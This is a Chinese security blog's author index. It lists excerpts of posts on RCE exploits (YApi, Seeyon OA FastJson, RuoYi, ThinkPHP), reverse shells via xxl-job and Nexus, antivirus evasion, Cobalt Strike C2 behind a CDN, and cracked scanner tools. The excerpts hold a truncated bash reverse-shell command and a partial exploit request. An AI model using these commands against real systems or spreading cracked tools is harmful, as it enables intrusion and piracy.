admin 发表的所有文章 | CN-SEC 中文网

安全闲碎

企业信息安全建设的思考

0x00 安全观安全1、安全的本质在企业做信息安全会遇到很多困惑，企业信息安全到底应该怎么做？管理、技术、流程还是人更重要？安全团队和安全人才该怎么建设培养和激励？带着这些问题参加了很多...

12月01日88 views评论

阅读全文

安全工具

AWVS破解版本14.5.211109105

0x01 AWVS更新介绍AWVS14.5.211109105更新于2021年11月9日，此次更新增加了CVE-2020-10770&CVE-2021-41773的漏洞检查，并且修复了点击劫持...

11月30日609 views评论

阅读全文

安全工具

YApi RCE

YAPI简介YAPI是由去哪儿网移动架构组(简称YMFE，一群由FE、iOS和Android工程师共同组成的最具想象力、创造力和影响力的大前端团队)开发的可视化接口管理工具，是一个可本地部署的、打通前...

11月30日273 views已关闭评论

阅读全文

安全博客

致远 OA FastJson rce 回显

自行搭建环境利用方式一路径/seeyon/sursenServletPOCPOST /seeyon/sursenServlet HTTP/1.1 sursenData=%7B%22name%22%3A...

11月30日1,352 views已关闭评论

阅读全文

代码审计

3.0.12版本 Tmymeleaf RCE的终结？（若依ruoyi最新版本后台RCE）

前期利用前段时间看到很多小伙伴研究若依这个系统的漏洞，让我想起若干年前在CNVD交的一个若依任意修改密码洞。https://threedr3am.github.io/images/zsxq/cnvd-...

11月30日1,293 views已关闭评论

阅读全文

ThinkPhp 5.x Rce

# /usr/bin/env python3 # -*- coding: utf-8 -*- # @Author: Morker # @Email: [email protected] # @Blog: https://...

11月30日安全博客121 views已关闭评论

阅读全文

安全博客

xxl-job反弹shell

利用过程点击任务管理、新增一个执行任务，配置如下（运行模式选择shell，cron是linux定时任务，如下0时0分0秒执行一次）：进入GLUE面板，写入执行的脚本命令。随意命名备注名称，保存并关闭0...

11月30日215 views已关闭评论

阅读全文

安全博客

Nexus反弹shell

Nexus反弹shellhttp://target/#admin/system/tasks 捕获#通用 ['/bin/bash','-c','/bin/bash -i >& /dev/t...

11月30日195 views已关闭评论

阅读全文

安全博客

Python免杀火绒、360和Defender

简介之前学习免杀都是使用Metasploit自带的编码进行，从未成功过。也使用过GitHub上别人提供的免杀方法，最近学习并实践发现绕过国内的杀毒软件貌似并不难，本文使用手工分析特征码，使用base6...

11月30日464 views已关闭评论

阅读全文

安全博客

cs配置cdn实现域名上线

前期准备国外VPS，用于放置 teamserver谷歌邮箱账号cloudflare.com/ 免费cdncobalt strike将cdn绑定teamserver的ip，之后，启动teamserver...

11月30日198 views已关闭评论

阅读全文

admin

企业信息安全建设的思考

最新AppScan10.0.6破解版

AWVS破解版本14.5.211109105

最新BurpSuit2021.10.1破解版本

YApi RCE

致远 OA FastJson rce 回显

3.0.12版本 Tmymeleaf RCE的终结？（若依ruoyi最新版本后台RCE）

ThinkPhp 5.x Rce

xxl-job反弹shell

Nexus反弹shell

Python免杀火绒、360和Defender

cs配置cdn实现域名上线

在线咨询

微信